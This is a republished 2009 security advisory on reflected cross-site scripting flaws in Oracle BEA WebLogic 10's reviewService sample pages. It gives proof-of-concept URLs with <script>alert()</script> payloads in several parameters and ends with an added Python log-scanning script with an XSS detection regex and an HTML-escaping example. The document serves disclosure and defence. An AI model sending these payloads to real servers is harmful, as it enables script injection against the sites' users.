Oracle BEA Weblogic 10 Cross Site Scripting

Published: 15 Jan 2009 00:00:00 | Reported by: Sh2kerr | Type: packetstorm | Source: packetstormsecurity.com

Oracle BEA Weblogic 10 XSS Vulnerabilities in Sample

```
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002


Application: Oracle BEA Weblogic 10
Versions Affected: Oracle BEA Weblogic 10
Vendor URL: http://oracle.com
Bugs: Multiple XSS Vulnerabilities in samples
Exploits: YES
Reported: 16.07.2008
Vendor response: 18.07.2008
Last response: 30.10.2008
Description: reviewService sample of WebLogic Server.
Date of Public Advisory: 13.01.2009
Authors: Alexandr Polyakov
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********

Multiple XSS vulnerabilities were found in the samples shipped with Oracle BEA Weblogic Server version 10.2 and later.


Details
*******

The vulnerabilities were found in the reviewService sample of Weblogic Server.

1. Linked XSS found in the createArtist_service.jsp page. Vulnerable parameter: "name"

Example
*******
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>


2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter: "title"

Example
*******
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>


3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter: "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>


4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter: "rating"

Example
*******
http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>


5. There are also a couple of XSS vulnerabilities in POST parameters of the following scripts:

http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp


Fix Information
***************

This is a Security-In-Depth issue, because it was found in samples (http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm).
Security-In-Depth issues result in significant modification of Oracle code or documentation in future releases,
but are not of such a critical nature that they are distributed in Critical Patch Updates.


http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html


Credits
*******

Oracle credited Alexander Polyakov of Digital Security in the Security-In-Depth program of the January 2009 CPU.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html


About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru
```
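The advisory lists the reviewService sample pages and the query parameters they reflect back to the browser. The script below is an added example and is not part of the advisory or of WebLogic: it parses constructed access-log lines, flags every request to one of those sample paths (the samples should not be reachable on a production server at all), marks the requests whose URL-decoded parameters carry script markup, and shows the HTML encoding a page would need before echoing a parameter. The log lines, client addresses and the `XSS_HINT` pattern are assumptions made for illustration. Because access logs do not record request bodies, traffic to the POST-parameter scripts from item 5 can only be noted as sample-app activity, not classified.

```python
"""Flag reflected-XSS probes against the WebLogic reviewService sample app in
access-log lines.  Added example; all log lines below are constructed."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Sample-application paths named in the DSecRG advisory.
SAMPLE_APP_PATHS = {
    "/reviewService/createArtist_service.jsp",
    "/reviewService/createArtist_session.jsp",
    "/reviewService/addBooks_session_ejb21.jsp",
    "/reviewService/addReview_service.jsp",
    "/reviewService/addReview_session.jsp",
    "/reviewService/examplesWebApp/JWS_WebService.jsp",
    "/reviewService/ClientServlet",
    "/reviewService/InterceptorClientServlet",
}

# Constructed Common Log Format lines (assumed sample input, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2009:10:15:32 +0300] "GET /reviewService/createArtist_service.jsp?name=%3Cscript%3Ealert%28%27DSECRG%27%29%3C%2Fscript%3E HTTP/1.1" 200 1532
10.0.0.7 - - [13/Jan/2009:10:16:01 +0300] "GET /reviewService/createArtist_service.jsp?name=Miles+Davis HTTP/1.1" 200 1498
10.0.0.9 - - [13/Jan/2009:10:17:45 +0300] "GET /reviewService/addReview_service.jsp?comment=111&rating=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1601
10.0.0.9 - - [13/Jan/2009:10:18:02 +0300] "POST /reviewService/ClientServlet HTTP/1.1" 200 880
10.0.0.3 - - [13/Jan/2009:10:19:10 +0300] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2210
"""

# client, timestamp, method, target, status; the HTTP version is skipped.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Crude indicators of markup or script in a decoded parameter value
# (assumed detection pattern; tune for the application's legitimate input).
XSS_HINT = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.I)


def parse_line(line):
    """Split one access-log line into fields; returns None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes values and turns '+' into spaces, so the
    # payload is inspected the way the JSP page would receive it.
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"client": client, "time": ts, "method": method,
            "path": parts.path, "params": params, "status": int(status)}


def xss_suspect_params(params):
    """Names of parameters whose decoded value looks like markup or script."""
    return sorted(k for k, vals in params.items()
                  if any(XSS_HINT.search(v) for v in vals))


def find_sample_app_activity(lines):
    """Return (client, path, verdict, suspect_params) for each sample-app hit."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in SAMPLE_APP_PATHS:
            continue
        bad = xss_suspect_params(rec["params"])
        if bad:
            findings.append((rec["client"], rec["path"], "xss-probe", bad))
        elif rec["method"] == "POST":
            # Body parameters are not logged, so a POST to a sample script
            # can only be recorded, not judged.
            findings.append((rec["client"], rec["path"], "post-body-unseen", []))
        else:
            findings.append((rec["client"], rec["path"], "sample-app-request", []))
    return findings


def safe_echo(value):
    """HTML-encode a parameter before echoing it into a page body or attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for finding in find_sample_app_activity(SAMPLE_LOG.splitlines()):
        print(*finding)
    print(safe_echo("<script>alert('DSECRG')</script>"))
```

Run as-is, the script reports two probes (the `name` and `rating` parameters), one plain request to a sample page, and one POST to ClientServlet whose body it cannot see; the console login line is ignored because it is not a sample-app path. The `safe_echo` output shows the payload rendered as inert text once every `<`, `>` and quote is encoded.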

Vulners AI Score: 7.4 (High risk)